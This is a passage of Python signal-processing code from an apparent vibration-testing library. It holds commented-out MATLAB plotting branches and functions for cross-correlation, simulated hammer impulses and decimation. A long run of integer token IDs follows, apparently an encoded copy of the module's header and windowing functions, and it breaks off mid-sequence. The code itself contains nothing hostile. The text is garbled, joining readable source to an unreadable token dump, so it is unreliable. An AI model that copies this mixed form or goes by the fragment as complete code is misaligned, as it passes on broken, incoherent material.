axis([Fmin Fmax minmag maxmag]) # zoom on # elseif FLAG==7 # subplot(1,1,1) # plot(F,phase) # xlabel('Frequency (Hz)') # ylabel('Phase (deg)') # grid on # phmin_max=[floor(min(phase)/45)*45 ceil(max(phase)/45)*45]; # axis([Fmin Fmax phmin_max(1) phmin_max(2)]) # gridmin_max=round(phmin_max/90)*90; # set(gca,'YTick',gridmin_max(1):90:gridmin_max(2)) # zoom on # elseif FLAG==8 # subplot(1,1,1) # plot(F,real(Xfer)) # xlabel('Frequency (Hz)') # ylabel('Real') # grid on # axis([Fmin Fmax minreal maxreal]) # zoom on # elseif FLAG==9 # subplot(1,1,1) # plot(F,imag(Xfer)) # xlabel('Frequency (Hz)') # ylabel('Imaginary') # grid on # axis([Fmin Fmax minimag maximag]) # zoom on # elseif FLAG==10 # subplot(1,1,1) # mag=20*log10(abs(Xfer)); # semilogx(F,mag) # xlabel('Frequency (Hz)') # ylabel('Mag (dB)') # grid on # axis([Fmin Fmax minmag maxmag]) # zoom on # elseif FLAG==11 # subplot(1,1,1) # semilogx(F,phase) # xlabel('Frequency (Hz)') # ylabel('Phase (deg)') # grid on # phmin_max=[floor(min(phase)/45)*45 ceil(max(phase)/45)*45]; # axis([Fmin Fmax phmin_max(1) phmin_max(2)]) # gridmin_max=round(phmin_max/90)*90; # set(gca,'YTick',gridmin_max(1):90:gridmin_max(2)) # zoom on # elseif FLAG==12 # subplot(1,1,1) # semilogx(F,real(Xfer)) # xlabel('Frequency (Hz)') # ylabel('Real') # grid on # axis([Fmin Fmax minreal maxreal]) # zoom on # elseif FLAG==13 # subplot(1,1,1) # semilogx(F,imag(Xfer)) # xlabel('Frequency (Hz)') # ylabel('Imaginary') # grid on # axis([Fmin Fmax minimag maximag]) # zoom on # elseif FLAG==14 # subplot(1,1,1) # mag=20*log10(abs(Xfer)); # semilogx(F*2*pi,mag) # xlabel('Frequency (Rad/s)') # ylabel('Mag (dB)') # grid on # axis([Wmin Wmax minmag maxmag]) # zoom on # elseif FLAG==15 # subplot(1,1,1) # semilogx(F*2*pi,phase) # xlabel('Frequency (Rad/s)') # ylabel('Phase (deg)') # grid on # axis([Wmin Wmax phmin_max(1) phmin_max(2)]) # gridmin_max=round(phmin_max/90)*90; # set(gca,'YTick',gridmin_max(1):90:gridmin_max(2)) # zoom on # else # subplot(2,1,1) # mag=20*log10(abs(Xfer)); # plot(F,mag) # xlabel('Frequency (Hz)') # ylabel('Mag (dB)') # grid on # axis([Fmin Fmax minmag maxmag]) # zoom on # subplot(2,1,2) # plot(F,phase) # xlabel('Frequency (Hz)') # ylabel('Phase (deg)') # grid on # phmin_max=[floor(min(phase)/45)*45 ceil(max(phase)/45)*45]; # axis([Fmin Fmax phmin_max(1) phmin_max(2)]) # gridmin_max=round(phmin_max/90)*90; # set(gca,'YTick',gridmin_max(1):90:gridmin_max(2)) # zoom on """ def xcorr(t, x, y, zeropad=True): """Sorry, no docs or tests yet.""" tau = t # sx = len(x) # sy = len(y) if zeropad is True: Xn = np.fft.rfft(x, n=len(x) * 2) Yn = np.conj(sp.fft(y, n=len(x) * 2)) else: Xn = np.fft.rfft(x) Yn = np.conj(np.fft.rfft(y)) xcor = np.real(fftpack.fftshift(sp.ifft(Xn * Yn))) dt = t[1] - t[0] tau = np.linspace(-len(xcor) / 2 * dt - dt / 2, len(xcor) / 2 * dt - dt / 2, len(xcor)) return tau, xcor def hammer_impulse(time, imp_time=None, imp_duration=None, doublehit=False, dh_delta=None): """Generate simulated hammer hit (half sine). Parameters ---------- time : float array 1 x N time array. Suggest using `np.linspace(0,10,1000).reshape(1,-1)` for example imp_time : float (optional) Time of onset of impulse. Default is 0.1 time end time- which traditionally works well for impact testing imp_duration : float (optional) Duration of impulse. Default is 0.01 of total record doublehit : Boolean (optional) Allows repeat of hit to emulate a bad strike. Default is False dh_delta : float (optional) Time difference between primary strike and accidental second strike Default is 0.02 of record. Returns ------- force : float array Examples -------- >>> import vibrationtesting as vt >>> time = np.linspace(0,10,1024).reshape(1,-1) >>> force = vt.hammer_impulse(time, doublehit=True) >>> plt.plot(time.T, force.T) [<matplotlib.lines.Line2D object... """ time_max = np.max(time) if imp_time is None: imp_time = 0.1 * time_max if imp_duration is None: imp_duration = 0.01 * time_max if dh_delta is None: dh_delta = 0.02 dh_delta = dh_delta * time_max time = time.reshape(1, -1) imp_onset_index = int(time.shape[1] * imp_time / time_max) imp_offset_index = int((time.shape[1]) * (imp_time + imp_duration) / time_max) imp_length = imp_offset_index - imp_onset_index T = imp_duration * 2 omega = 2 * np.pi / T impulse = np.sin(omega * time[0, :imp_length]) force = np.zeros_like(time) force[0, imp_onset_index:imp_onset_index + imp_length] = impulse if doublehit is True: doub_onset_index = int(time.shape[1] * (imp_time + dh_delta) / time_max) force[0, doub_onset_index:doub_onset_index + imp_length] = impulse force = force / spi.simps(force.reshape(-1), dx=time[0, 1]) return force def decimate(t, in_signal, sample_frequency): r"""Decimate a signal to mimic sampling anti-aliased signal. Returns the signal down-sampled to `sample_frequency` with an anti-aliasing filter applied at 45% of ` sample_frequency`. Parameters ---------- t : float array time array, size (N,) signal : float array signal array, size (N,), (m,N), or (m,N,n) sample_frequency : float new sampling frequency Returns ------- time : float array decimated_signal : float array Examples -------- >>> time = np.linspace(0,4,4096) >>> u = np.random.randn(1,len(time)) >>> ttime, signal_out = decimate(time, u, 100) """ dt = t[1] - t[0] current_frequency = 1 / dt freq_frac = sample_frequency / current_frequency Wn = .9 * freq_frac b, a = signal.butter(8, Wn, 'low') if len(in_signal.shape) > 1: filtered_signal = signal.lfilter(b, a, in_signal, axis=1) else: filtered_signal = signal.lfilter(b, a, in_signal) step = int(1 / freq_frac) time = t[::step] if len(in_signal.shape) == 1: filtered_signal = filtered_signal[::step] elif len(in_signal.shape) == 2: filtered_signal = filtered_signal[:, ::step] elif len(in_signal.shape) == 3: filtered_signal = filtered_signal[:, ::step, :] return time, filtered_signal
[ 37811, 198, 11712, 282, 7587, 11, 6282, 290, 29353, 13, 198, 198, 32750, 286, 1366, 290, 5270, 286, 28590, 10256, 13, 198, 37811, 198, 834, 43085, 834, 796, 366, 29458, 327, 13, 44289, 1, 198, 198, 834, 15390, 18982, 834, 796, 705, 260, 44909, 1522, 8206, 6, 198, 198, 2, 1330, 14601, 198, 198, 11748, 299, 32152, 355, 45941, 198, 11748, 629, 541, 88, 355, 599, 198, 11748, 629, 541, 88, 13, 487, 83, 8002, 355, 277, 701, 8002, 198, 11748, 629, 541, 88, 13, 75, 1292, 70, 355, 8591, 198, 11748, 2603, 29487, 8019, 13, 9078, 29487, 355, 458, 83, 198, 11748, 629, 541, 88, 13, 18908, 4873, 355, 599, 72, 198, 11748, 629, 541, 88, 13, 12683, 282, 355, 6737, 198, 198, 37811, 198, 16130, 25, 198, 23031, 198, 14635, 13, 513, 11, 1584, 198, 41206, 286, 9168, 287, 629, 541, 88, 13, 12683, 282, 468, 587, 5801, 290, 198, 67, 13221, 278, 644, 314, 815, 1382, 656, 428, 8265, 11, 393, 2391, 16094, 198, 6738, 629, 541, 88, 13, 12683, 282, 468, 587, 257, 3867, 2496, 13, 198, 1026, 338, 783, 4156, 326, 4441, 393, 8024, 257, 4324, 318, 27158, 13, 7735, 11, 198, 4677, 3157, 815, 307, 257, 5365, 2829, 2438, 909, 8903, 803, 881, 286, 597, 761, 329, 262, 198, 8189, 994, 13, 198, 198, 464, 3272, 10958, 3781, 15734, 14394, 318, 783, 1695, 11, 2278, 21857, 198, 271, 3221, 262, 1266, 3038, 11, 2158, 407, 351, 25278, 2859, 20597, 13, 4091, 198, 63, 1416, 541, 88, 13, 12683, 282, 63, 329, 428, 13, 8989, 11, 262, 21396, 287, 428, 8265, 389, 407, 198, 5936, 7609, 351, 4600, 1416, 541, 88, 13, 12683, 282, 44646, 1119, 1061, 883, 286, 4600, 29412, 12, 13716, 63, 198, 198, 10913, 37, 17952, 318, 6032, 20861, 11, 367, 85, 852, 281, 2938, 7625, 890, 3381, 198, 44, 3955, 46, 8782, 37, 17952, 318, 281, 1280, 1808, 13, 20090, 13570, 286, 8782, 42388, 318, 1464, 198, 64, 7062, 2891, 13, 198, 198, 11964, 4522, 318, 1884, 262, 5637, 4814, 4843, 379, 428, 640, 13, 198, 198, 818, 1502, 284, 307, 6414, 351, 262, 6779, 11998, 10074, 11, 3649, 640, 198, 273, 3649, 8373, 4831, 19888, 351, 3220, 5721, 1271, 357, 505, 198, 46156, 737, 371, 1666, 357, 15, 15793, 8, 198, 10215, 5546, 284, 5035, 9619, 11, 5072, 3146, 11, 3503, 13, 198, 198, 1890, 3272, 10958, 1366, 357, 19692, 10958, 12109, 11, 8373, 2882, 2163, 8, 198, 1169, 362, 15793, 6870, 262, 5128, 6518, 13, 198, 198, 464, 938, 15793, 357, 17, 393, 513, 8, 39199, 1123, 1366, 4554, 357, 23100, 3681, 737, 1320, 1724, 198, 5562, 281, 555, 8770, 1886, 3272, 10958, 12109, 468, 15793, 604, 13, 1002, 612, 318, 691, 257, 198, 29762, 5128, 6518, 11, 340, 318, 23602, 284, 16361, 262, 5391, 1463, 2152, 11, 772, 611, 198, 8807, 4129, 352, 13, 770, 318, 2037, 363, 516, 284, 257, 15879, 852, 399, 87, 16, 9051, 2391, 257, 198, 16, 12, 35, 7177, 286, 4129, 352, 13, 198, 198, 4023, 1378, 29412, 12, 13716, 13, 961, 83, 704, 420, 82, 13, 952, 14, 268, 14, 42861, 14, 1102, 16593, 13, 6494, 2, 2435, 12, 25076, 12, 7890, 198, 198, 40781, 25, 770, 5818, 470, 587, 3938, 9177, 13, 198, 37811, 628, 198, 4299, 4324, 7, 87, 11, 2344, 593, 480, 11639, 7637, 768, 3256, 3487, 1096, 28, 25101, 2599, 198, 220, 220, 220, 374, 37811, 16447, 47988, 4324, 13, 628, 220, 220, 220, 13610, 257, 220, 4324, 286, 4129, 1058, 11018, 25, 63, 87, 47671, 393, 257, 4324, 19943, 284, 2872, 198, 220, 220, 220, 1058, 11018, 25, 63, 87, 63, 326, 1058, 11018, 25, 63, 87, 59, 22355, 266, 63, 318, 262, 4324, 276, 1255, 13, 628, 220, 220, 220, 40117, 198, 220, 220, 220, 24200, 438, 198, 220, 220, 220, 2124, 25, 18253, 11, 12178, 7177, 198, 220, 220, 220, 220, 220, 220, 930, 1002, 18253, 12, 1271, 286, 2173, 287, 10348, 289, 272, 768, 9168, 13, 198, 220, 220, 220, 220, 220, 220, 930, 1002, 7177, 12, 7177, 3769, 2546, 286, 4324, 4504, 13, 198, 220, 220, 220, 2344, 593, 480, 25, 4731, 198, 220, 220, 220, 220, 220, 220, 1881, 286, 25, 289, 272, 768, 11, 8891, 2229, 11, 2042, 805, 11, 6228, 5404, 11, 3091, 5404, 198, 220, 220, 220, 3487, 1096, 25, 20512, 11, 11902, 7, 25101, 8, 198, 220, 220, 220, 220, 220, 220, 20292, 1176, 1241, 357, 1640, 779, 287, 38661, 8, 284, 352, 628, 220, 220, 220, 16409, 198, 220, 220, 220, 35656, 198, 220, 220, 220, 266, 25, 12178, 7177, 198, 220, 220, 220, 220, 220, 220, 930, 4324, 7177, 286, 2546, 2124, 198, 220, 220, 220, 220, 220, 220, 930, 4324, 7177, 13, 3086, 6972, 7177, 318, 788, 1058, 11018, 25, 63, 87, 59, 22355, 266, 63, 628, 220, 220, 220, 21066, 198, 220, 220, 220, 24200, 198, 220, 220, 220, 13163, 1330, 299, 32152, 355, 45941, 198, 220, 220, 220, 13163, 1330, 30999, 33407, 355, 410, 83, 198, 220, 220, 220, 13163, 1330, 2603, 29487, 8019, 13, 9078, 29487, 355, 458, 83, 198, 220, 220, 220, 13163, 6291, 62, 19503, 80, 796, 352, 68, 18, 198, 220, 220, 220, 13163, 256, 20311, 796, 642, 198, 220, 220, 220, 13163, 43458, 796, 1802, 198, 220, 220, 220, 13163, 317, 796, 838, 198, 220, 220, 220, 13163, 2030, 80, 796, 642, 198, 220, 220, 220, 13163, 7838, 62, 6477, 796, 657, 13, 8298, 1635, 6291, 62, 19503, 80, 1220, 362, 198, 220, 220, 220, 13163, 640, 796, 45941, 13, 3447, 1758, 7, 37659, 13, 283, 858, 7, 15, 11, 256, 20311, 11, 352, 14, 39873, 62, 19503, 80, 828, 7, 16, 12095, 16, 4008, 198, 220, 220, 220, 13163, 2124, 31369, 796, 317, 9, 37659, 13, 31369, 7, 17, 9, 37659, 13, 14415, 9, 19503, 80, 9, 2435, 8, 198, 220, 220, 220, 13163, 2124, 6966, 796, 317, 9, 37659, 13, 6966, 7, 17, 9, 37659, 13, 14415, 9, 19503, 80, 9, 2435, 8, 1303, 40525, 1981, 4406, 13, 198, 220, 220, 220, 13163, 2124, 28, 37659, 13, 67, 25558, 19510, 87, 31369, 11, 87, 6966, 4008, 1303, 40525, 1981, 4406, 13, 410, 25558, 198, 220, 220, 220, 13163, 2124, 86, 28, 36540, 13, 7637, 768, 7, 87, 27493, 87, 198, 220, 220, 220, 13163, 2336, 11, 357, 897, 16, 11, 7877, 17, 8, 796, 458, 83, 13, 7266, 489, 1747, 7, 17, 11, 16, 8, 198, 220, 220, 220, 13163, 7877, 16, 13, 29487, 7, 2435, 13, 51, 11, 87, 58, 45299, 45299, 16, 4083, 51, 8, 198, 220, 220, 220, 685, 27, 6759, 29487, 8019, 13, 6615, 13, 13949, 17, 35, 2134, 379, 2644, 37981, 198, 220, 220, 220, 13163, 7877, 16, 13, 2617, 62, 88, 2475, 26933, 12, 1238, 11, 1160, 12962, 198, 220, 220, 220, 13841, 1238, 11, 1160, 8, 198, 220, 220, 220, 13163, 7877, 16, 13, 2617, 62, 7839, 10786, 20556, 357, 1831, 8, 1366, 2637, 8, 198, 220, 220, 220, 8255, 7, 15, 13, 20, 11, 16, 4032, 20556, 357, 1831, 8, 1366, 2637, 8, 198, 220, 220, 220, 13163, 7877, 16, 13, 2617, 62, 2645, 9608, 10786, 3, 87, 7, 83, 8, 3, 11537, 198, 220, 220, 220, 8255, 7, 15, 11, 15, 13, 20, 4032, 3, 87, 7, 83, 8, 3, 11537, 198, 220, 220, 220, 13163, 7877, 17, 13, 29487, 7, 2435, 58, 15, 11, 25, 4357, 87, 86, 58, 15, 11, 25, 4357, 2435, 58, 15, 11, 25, 4357, 36540, 13, 7637, 768, 7, 87, 38381, 15, 11, 47715, 9, 32, 4032, 438, 3256, 198, 220, 220, 220, 2644, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 640, 58, 15, 11, 25, 4357, 12, 36540, 13, 7637, 768, 7, 87, 38381, 15, 11, 47715, 9, 32, 4032, 438, 11537, 198, 220, 220, 220, 685, 27, 6759, 29487, 8019, 13, 6615, 13, 13949, 17, 35, 2134, 379, 2644, 37981, 198, 220, 220, 220, 13163, 7877, 17, 13, 2617, 62, 2645, 9608, 10786, 29919, 768, 4324, 276, 720, 87, 7, 83, 8, 3, 11537, 198, 220, 220, 220, 8255, 7, 15, 11, 15, 13, 20, 4032, 29919, 768, 4324, 276, 720, 87, 7, 83, 8, 3, 11537, 198, 220, 220, 220, 13163, 7877, 17, 13, 2617, 62, 87, 18242, 10786, 2435, 11537, 198, 220, 220, 220, 8255, 7, 15, 13, 20, 11, 15, 4032, 2435, 11537, 198, 220, 220, 220, 13163, 7877, 17, 13, 2617, 62, 7839, 10786, 18610, 286, 4324, 13, 5740, 262, 20796, 284, 45075, 38661, 37188, 11537, 198, 220, 220, 220, 8255, 7, 15, 13, 20, 11, 16, 4032, 18610, 286, 4324, 13, 5740, 262, 20796, 284, 45075, 38661, 37188, 11537, 198, 220, 220, 220, 13163, 2336, 13, 33464, 62, 39786, 3419, 628, 220, 220, 220, 37227, 198, 220, 220, 220, 611, 318, 39098, 7, 87, 11, 357, 4868, 11, 46545, 11, 45941, 13, 358, 18747, 8, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 16447, 9530, 768, 4324, 278, 7177, 286, 15793, 4600, 77, 63, 416, 4600, 45, 63, 416, 4600, 48624, 63, 198, 220, 220, 220, 220, 220, 220, 220, 810, 4600, 45, 63, 318, 1271, 286, 1366, 2173, 290, 4600, 77, 63, 318, 262, 1271, 286, 1271, 286, 198, 220, 220, 220, 220, 220, 220, 220, 17311, 393, 23862, 290, 4600, 48624, 63, 318, 262, 1271, 286, 4406, 526, 15931, 628, 220, 220, 220, 220, 220, 220, 220, 16075, 796, 657, 198, 220, 220, 220, 220, 220, 220, 220, 611, 18896, 7, 87, 13, 43358, 8, 6624, 352, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 775, 423, 2035, 257, 16578, 283, 393, 352, 35, 7177, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 611, 2124, 13, 43358, 58, 15, 60, 6624, 352, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 3601, 7203, 87, 318, 257, 16578, 283, 986, 290, 6584, 43054, 83, 423, 5982, 428, 3467, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 636, 286, 262, 9052, 19570, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2073, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 399, 796, 18896, 7, 87, 8, 628, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 277, 796, 4324, 7, 45, 11, 2344, 593, 480, 28, 7972, 593, 480, 8, 628, 220, 220, 220, 220, 220, 220, 220, 1288, 361, 18896, 7, 87, 13, 43358, 8, 6624, 513, 25, 628, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 611, 2124, 13, 43358, 58, 15, 60, 1875, 2124, 13, 43358, 58, 16, 5974, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2124, 796, 45941, 13, 2032, 499, 897, 274, 7, 87, 11, 657, 11, 352, 8, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 16075, 796, 352, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 3601, 10786, 1639, 6584, 43054, 83, 466, 326, 2637, 8, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 3601, 10786, 464, 352, 15793, 318, 262, 640, 357, 273, 8373, 8, 3467, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 18703, 278, 15793, 2637, 8, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 3601, 10786, 10462, 5912, 34197, 13413, 284, 307, 31332, 351, 3467, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 9027, 13, 314, 43054, 297, 4259, 606, 287, 534, 1255, 11537, 628, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 399, 796, 2124, 13, 43358, 58, 16, 60, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 277, 796, 4324, 7, 45, 11, 2344, 593, 480, 28, 7972, 593, 480, 8, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 277, 11, 4808, 11, 4808, 796, 45941, 13, 76, 5069, 25928, 7, 69, 11, 45941, 13, 283, 858, 7, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2124, 13, 43358, 58, 15, 46570, 45941, 13, 283, 858, 7, 87, 13, 43358, 58, 17, 60, 4008, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 611, 16075, 6624, 352, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 277, 796, 45941, 13, 2032, 499, 897, 274, 7, 69, 11, 657, 11, 352, 8, 628, 220, 220, 220, 220, 220, 220, 220, 1288, 361, 18896, 7, 87, 13, 43358, 8, 6624, 362, 25, 628, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 611, 2124, 13, 43358, 58, 15, 60, 1875, 2124, 13, 43358, 58, 16, 5974, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2124, 796, 45941, 13, 2032, 499, 897, 274, 7, 87, 11, 657, 11, 352, 8, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 16075, 796, 352, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 3601, 10786, 1639, 6584, 43054, 83, 466, 326, 2637, 8, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 3601, 10786, 464, 352, 15793, 318, 262, 640, 357, 273, 8373, 8, 705, 1343, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 705, 24988, 434, 278, 15793, 2637, 8, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 3601, 10786, 10462, 5912, 34197, 13413, 284, 307, 31332, 351, 705, 1343, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 705, 1069, 806, 602, 2637, 8, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 3601, 10786, 40, 43054, 297, 35462, 1441, 257, 1007, 29813, 1255, 2637, 8, 628, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 277, 796, 4324, 7, 87, 13, 43358, 58, 16, 4357, 2344, 593, 480, 28, 7972, 593, 480, 8, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 277, 11, 4808, 796, 45941, 13, 76, 5069, 25928, 7, 69, 11, 45941, 13, 283, 858, 7, 87, 13, 43358, 58, 15, 60, 4008, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 611, 16075, 6624, 352, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 277, 796, 45941, 13, 2032, 499, 897, 274, 7, 69, 11, 657, 11, 352, 8, 628, 220, 220, 220, 2073, 25, 198, 220, 220, 220, 220, 220, 220, 220, 399, 796, 2124, 198, 220, 220, 220, 220, 220, 220, 220, 611, 2344, 593, 480, 318, 705, 7637, 768, 10354, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 277, 796, 45941, 13, 31369, 7, 37659, 13, 14415, 1635, 45941, 13, 283, 858, 7, 45, 8, 1220, 357, 45, 532, 352, 4008, 1174, 17, 1635, 45941, 13, 31166, 17034, 7, 23, 1220, 513, 8, 198, 220, 220, 220, 220, 220, 220, 220, 1288, 361, 2344, 593, 480, 318, 705, 2763, 2229, 10354, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 277, 796, 357, 15, 13, 4051, 532, 657, 13, 3510, 1635, 45941, 13, 6966, 7, 17, 1635, 45941, 13, 14415, 1635, 357, 37659, 13, 283, 858, 7, 45, 4008, 1220, 357, 45, 532, 352, 4008, 19415, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1635, 45941, 13, 31166, 17034, 7, 27641, 1220, 12923, 8, 198, 220, 220, 220, 220, 220, 220, 220, 1288, 361, 2344, 593, 480, 318, 705, 13424, 805, 10354, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 3601, 10786, 13424, 805, 11537, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 277, 796, 357, 15, 13, 3682, 532, 657, 13, 20, 1635, 45941, 13, 6966, 7, 17, 1635, 45941, 13, 14415, 1635, 357, 37659, 13, 283, 858, 7, 45, 8, 1343, 764, 20, 8, 1220, 357, 45, 4008, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1343, 764, 2919, 1635, 45941, 13, 6966, 7, 19, 1635, 45941, 13, 14415, 1635, 357, 37659, 13, 283, 858, 7, 45, 8, 1343, 764, 20, 8, 1220, 357, 45, 4008, 19415, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1635, 45941, 13, 31166, 17034, 7, 27641, 1220, 1315, 1954, 8, 198, 220, 220, 220, 220, 220, 220, 220, 1288, 361, 2344, 593, 480, 318, 705, 38568, 5404, 10354, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 277, 796, 352, 13, 15, 532, 352, 13, 24, 2091, 1635, 45941, 13, 6966, 7, 17, 1635, 45941, 13, 14415, 1635, 357, 37659, 13, 283, 858, 7, 45, 4008, 1220, 357, 45, 532, 352, 4008, 59, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1343, 352, 13, 27033, 1635, 45941, 13, 6966, 7, 19, 1635, 45941, 13, 14415, 1635, 357, 37659, 13, 283, 858, 7, 45, 4008, 1220, 357, 45, 532, 352, 4008, 59, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 532, 657, 13, 28460, 1635, 45941, 13, 6966, 7, 21, 1635, 45941, 13, 14415, 1635, 357, 37659, 13, 283, 858, 7, 45, 4008, 1220, 357, 45, 532, 352, 4008, 59, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1343, 657, 13, 49959, 1635, 45941, 13, 6966, 7, 23, 1635, 45941, 13, 14415, 1635, 357, 37659, 13, 283, 858, 7, 45, 4008, 1220, 357, 45, 532, 352, 4008, 198, 220, 220, 220, 220, 220, 220, 220, 1288, 361, 2344, 593, 480, 318, 705, 3524, 5404, 10354, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 277, 796, 45941, 13, 1952, 19510, 16, 11, 399, 4008, 198, 220, 220, 220, 220, 220, 220, 220, 2073, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 277, 796, 45941, 13, 1952, 19510, 16, 11, 399, 4008, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 3601, 7203, 40, 836, 470, 7564, 4324, 1438, 33172, 2344, 593, 480, 11, 27071, 19061, 19570, 628, 220, 220, 220, 220, 220, 220, 220, 611, 3487, 1096, 318, 6407, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 277, 796, 277, 1220, 8591, 13, 27237, 7, 69, 8, 1635, 45941, 13, 31166, 17034, 7, 45, 8, 198, 220, 220, 220, 1441, 277, 628, 198, 4299, 289, 272, 768, 7, 87, 11, 3487, 1096, 28, 25101, 2599, 198, 220, 220, 220, 374, 37811, 13615, 289, 272, 768, 4324, 13, 628, 220, 220, 220, 13610, 257, 289, 272, 768, 4324, 286, 4129, 1058, 11018, 25, 63, 87, 47671, 393, 257, 289, 272, 768, 4324, 19943, 284, 198, 220, 220, 220, 2872, 1058, 11018, 25, 63, 87, 63, 326, 1058, 11018, 25, 63, 87, 59, 22355, 266, 63, 318, 262, 4324, 276, 1255, 13, 628, 220, 220, 220, 40117, 198, 220, 220, 220, 24200, 438, 198, 220, 220, 220, 2124, 25, 18253, 11, 12178, 7177, 198, 220, 220, 220, 220, 220, 220, 930, 1002, 18253, 12, 1271, 286, 2173, 287, 10348, 289, 272, 768, 9168, 13, 198, 220, 220, 220, 220, 220, 220, 930, 1002, 7177, 12, 7177, 3769, 2546, 286, 4324, 4504, 13, 198, 220, 220, 220, 2344, 593, 480, 25, 4731, 198, 220, 220, 220, 220, 220, 220, 1881, 286, 25, 289, 272, 768, 11, 8891, 2229, 11, 2042, 805, 11, 6228, 5404, 11, 3091, 5404, 198, 220, 220, 220, 3487, 1096, 25, 20512, 11, 11902, 7, 25101, 8, 198, 220, 220, 220, 220, 220, 220, 20292, 1176, 1241, 357, 1640, 779, 287, 38661, 8, 284, 352, 628, 220, 220, 220, 16409, 198, 220, 220, 220, 35656, 198, 220, 220, 220, 266, 25, 12178, 7177, 198, 220, 220, 220, 220, 220, 220, 930, 4324, 7177, 286, 2546, 2124, 198, 220, 220, 220, 220, 220, 220, 930, 4324, 7177, 13, 3086, 6972, 7177, 318, 788, 1058, 11018, 25, 63, 87, 59, 22355, 266, 63, 628, 220, 220, 220, 21066, 198, 220, 220, 220, 24200, 198, 220, 220, 220, 13163, 1330, 299, 32152, 355, 45941, 198, 220, 220, 220, 13163, 1330, 30999, 33407, 355, 410, 83, 198, 220, 220, 220, 13163, 1330, 2603, 29487, 8019, 13, 9078, 29487, 355, 458, 83, 198, 220, 220, 220, 13163, 6291, 62, 19503, 80, 796, 352, 68, 18, 198, 220, 220, 220, 13163, 256, 20311, 796, 642, 198, 220, 220, 220, 13163, 43458, 796, 1802, 198, 220, 220, 220, 13163, 317, 796, 838, 198, 220, 220, 220, 13163, 2030, 80, 796, 642, 198, 220, 220, 220, 13163, 7838, 62, 6477, 796, 657, 13, 8298, 1635, 6291, 62, 19503, 80, 1220, 362, 198, 220, 220, 220, 13163, 640, 796, 45941, 13, 3447, 1758, 7, 37659, 13, 283, 858, 7, 15, 11, 256, 20311, 11, 352, 14, 39873, 62, 19503, 80, 828, 7, 16, 12095, 16, 4008, 198, 220, 220, 220, 13163, 2124, 31369, 796, 317, 9, 37659, 13, 31369, 7, 17, 9, 37659, 13, 14415, 9, 19503, 80, 9, 2435, 8, 198, 220, 220, 